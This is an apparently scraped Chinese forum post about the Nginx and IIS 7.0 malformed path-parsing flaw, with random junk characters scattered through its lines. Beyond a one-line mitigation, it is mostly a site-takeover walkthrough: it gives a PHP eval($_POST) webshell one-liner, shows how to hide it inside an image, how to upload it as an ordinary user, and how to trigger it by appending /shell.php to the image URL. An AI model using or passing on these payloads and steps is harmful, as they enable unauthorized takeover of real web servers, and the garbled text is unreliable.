IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。临时解决办法:关闭cgi.fix_pathinfo为0
0 T8 Q0 e& z" y- T& gNginx好像又爆0day了,windows下可任意查看和下载脚本文件 王猛 IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。4 U2 h7 y( }( L. }* [
__________________________________ % z1 H& n5 }9 a" K- I- E
% G" [: {8 K1 M; w3 M+ E先说一下Nginx那个0day(出来有几天了,因为介绍的网站很多,所以当时就没转载)
9 j9 m" m1 r$ u+ E" q先合并一张PHP一句话图片马,合并方法: & s7 l" v" F8 D) Z, p
①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif
& P. z/ D; n9 Q# Q `$ f②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为"<?fputs(fopen("shell.PHP","w"),"<?eval($_POST[akt]);?>")?>" G& r4 m: h) ~& U4 i6 \* |
图片随便找一张.
; \' `& J. S$ e: z+ V一句话:<?php fputs(fopen(shell.php,w),<?php eval($_POST[akt])?>);?> 2 \/ R) \9 \) L B4 m
然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。 3 q8 J4 F7 W% Q& M. q
找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。
- W$ F& i1 ]" r" p比如假设图片地址为 http://www.political-security.com/tupian/1.jpg
% s- z; h6 r J6 Q- s N9 d. L则执行地址为 http://www.political-security.com/tupian/1.jpg/shell.php
- Q# U/ ]# L7 [; o% T, `7 h2 T然后,会在目录下生成shell.php。比如: www.political-security.com/tupian/shell.php + Z d8 s2 \+ G: q
shell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。 : s# S Y- H3 I4 o
上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。 ) ^- w" x6 M) G. @
找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。 $ |: s0 }/ a1 F
在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。 T+ L( |' u1 S' O! e
剩下的就随便你去搞吧。 d/ [. Y! W# R0 c7 C
: i" _) X- M2 p/ F* K |